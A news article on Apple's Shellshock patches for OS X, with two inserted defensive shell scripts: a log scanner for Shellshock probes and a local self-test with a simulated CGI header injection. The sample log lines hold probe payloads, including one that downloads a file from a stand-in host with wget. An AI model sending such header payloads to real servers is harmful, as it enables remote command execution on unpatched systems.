Apple releases Mac OS X patches for Shellshock Bash bug

Apple has released security updates for its Mac OS X operating system to protect users from the newly reported Shellshock Bash bug

Apple has released security updates for its Mac OS X operating system to protect users from the newly reported Shellshock Bash bug, which affects Unix-based computers that run the Bash shell.

The release comes just days after Apple confirmed that Mac OS X, which is derived from Unix, was vulnerable to the bug, although the company claimed anyone using default Mac settings should be safe.

According to Apple, only users who configured advanced Unix services were at risk, but the company did not name any of the services involved.

Some users resorted to technical workarounds, but now Apple has published automatic updates for the latest versions of OS X.

Patches are available through Software Update for OS X Mavericks, Mountain Lion and Lion.

Security experts have warned that the bug in the Bash shell, which ships with OS X and with an estimated 500 million other Unix-based computers, is being actively exploited.

Researchers at security firm FireEye have observed a “significant amount of overtly malicious traffic” exploiting the Bash bug.

This malicious traffic includes malware droppers, reverse shells and backdoors, data exfiltration, and distributed denial of service (DDoS) attacks.

The researchers think it is only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise.

Attackers have deployed scanners that search for vulnerable machines, and those scanners have been bombarding networks with probe traffic since the 25-year-old bug was made public on 24 September.
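The probes these scanners send are easy to recognise in web server logs: the Bash function-definition prefix "() {" turns up in a request header such as User-Agent or Referer. As an added example that is not part of the original article, the shell script below runs that detection logic over a few constructed Apache-style access log lines (the IP addresses, paths and function names are invented for the example); pointed at a real log file it does the same job.

```shell
#!/bin/sh
# Added example, not from the article: spot Shellshock probes in web server
# access logs. Scanners put the Bash function-definition prefix "() {" into a
# request header so that a Bash-backed CGI script parses it from its
# environment. The three log lines below are constructed for this example:
# the first is a benign request, the other two mimic scanner probes.
SAMPLE_LOG='203.0.113.5 - - [26/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 17 "-" "() { :;}; /bin/ping -c1 198.51.100.7"
198.51.100.9 - - [26/Sep/2014:10:02:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :; }; wget http://198.51.100.9/x -O /tmp/x" "-"'

# Extended regex for the prefix. The optional whitespace matters: scanners
# varied the spacing ("() {", "(){", "()  {") to dodge naive string matches.
PROBE_RE='\(\)[[:space:]]*\{'

# Print every log line carrying the prefix. With file arguments the real logs
# are scanned; with none, the constructed sample above is used.
shellshock_probes() {
    if [ "$#" -gt 0 ]; then
        grep -E "$PROBE_RE" "$@"
    else
        printf '%s\n' "$SAMPLE_LOG" | grep -E "$PROBE_RE"
    fi
}

# Number of matching requests, a quick triage metric.
shellshock_probe_count() {
    shellshock_probes "$@" | wc -l | tr -d ' '
}

# Distinct source addresses of the probes (first field of the combined log
# format), ready for blocking or for correlating with outbound connections.
shellshock_probe_sources() {
    shellshock_probes "$@" | awk '{ print $1 }' | sort -u
}

# Stand-alone run against the constructed sample.
printf 'probe lines: %s\n' "$(shellshock_probe_count)"
printf 'probe sources:\n'
shellshock_probe_sources
```

A hit in the log only proves that a probe arrived, not that it succeeded; the follow-up is to check whether the requested path is served by a CGI script that runs under Bash, and whether the host made the outbound connection the payload asked for (the ping or the wget in the sample lines).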

The Shellshock bug is widely regarded as a bigger threat than the Heartbleed OpenSSL bug because it affects a thousand times more computers and, where a vulnerable service is exposed, lets attackers run arbitrary commands on the target, often without any authentication.


The US and UK computer emergency response teams were quick to issue warnings about the Shellshock bug, and urged affected organisations to install software security updates immediately.

The Information Commissioner’s Office (ICO) has also urged organisations and individuals to make sure their IT systems are up to date.

“This flaw could be allowing criminals to access personal data held on computers or other devices. For businesses, that should be ringing real alarm bells, because they have legal obligations to keep personal information secure,” an ICO spokesperson said.

The biggest threat is to the enterprise because many web servers run on Apache, and an Apache server that executes CGI scripts passes request headers to those scripts as environment variables; if a script is written in Bash, or invokes Bash, an attacker can run commands on the server simply by putting them in a request header.
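The mechanism is short enough to demonstrate. The following shell script, an added example that is not part of the original article or of Apple's update, first runs the classic one-line self-test for the original Shellshock bug (CVE-2014-6271) and then simulates what a CGI server does with a request: export the header as an environment variable and start a Bash script. The function names, the fake User-Agent value and the throwaway CGI script are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the article or from Apple: a local self-test for the
# original Shellshock bug (CVE-2014-6271) plus a simulation of the path by
# which a CGI web server hands an attacker-controlled request header to Bash.
# Function names, the fake header value and the CGI script are constructed.

# Classic probe. On a vulnerable Bash the exported variable is parsed as a
# function definition at startup and the text after the closing brace is
# executed too, so VULNERABLE is printed before the real command runs.
# A fixed Bash ignores the trailing text (it may warn on stderr, suppressed here).
shellshock_check() {
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo ok' 2>/dev/null || true)
    case "$out" in
        *VULNERABLE*) echo vulnerable ;;
        *)            echo not-vulnerable ;;
    esac
}

# What mod_cgi does with a request: every header becomes an HTTP_* variable in
# the environment of the CGI program. If that program is a Bash script, or
# calls system()/popen() on a host where /bin/sh is Bash, the header is parsed
# by Bash before the script's first line runs. Here the "server" is just the
# export plus the exec, and $1 plays the User-Agent header the client sent.
simulate_cgi_request() {
    script=$(mktemp)
    cat >"$script" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "status: ok"
EOF
    HTTP_USER_AGENT="$1" bash "$script" 2>/dev/null || true
    rm -f "$script"
}

# Send the probe through the simulated server: "exploited" if the command
# smuggled in the header ran, "blocked" if Bash ignored it.
cgi_probe_result() {
    out=$(simulate_cgi_request '() { :;}; echo PAYLOAD-RAN')
    case "$out" in
        *PAYLOAD-RAN*) echo exploited ;;
        *)             echo blocked ;;
    esac
}

# Stand-alone run: both lines should read not-vulnerable / blocked on a Bash
# that carries the Shellshock fixes.
printf 'bash self-test: %s\n' "$(shellshock_check)"
printf 'simulated CGI probe: %s\n' "$(cgi_probe_result)"
```

Two caveats for anyone using this as a check. The probe tests only the first Shellshock bug; the initial fix was incomplete and a follow-up (CVE-2014-7169) needed a further patch, so an up-to-date package matters more than a single passing probe. And a server is exposed only if something on it runs Bash with attacker-controlled environment variables; a CGI script under a different shell, or an application that never spawns a shell, does not take this path, which is the distinction behind Apple's statement that default Mac configurations were not at risk.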

But, while most of the main Linux distributions have rushed to release updates, security experts have raised concerns about Unix-based embedded systems in internet of things (IoT) devices and legacy systems used by many critical national infrastructure suppliers.

Security researchers have warned that, while home users and traditional servers may be able to patch their way out of danger, this solution is not available for many embedded devices and Unix-based industrial control systems.

This also applies to supervisory control and data acquisition (Scada) systems commonly used by critical national infrastructure.
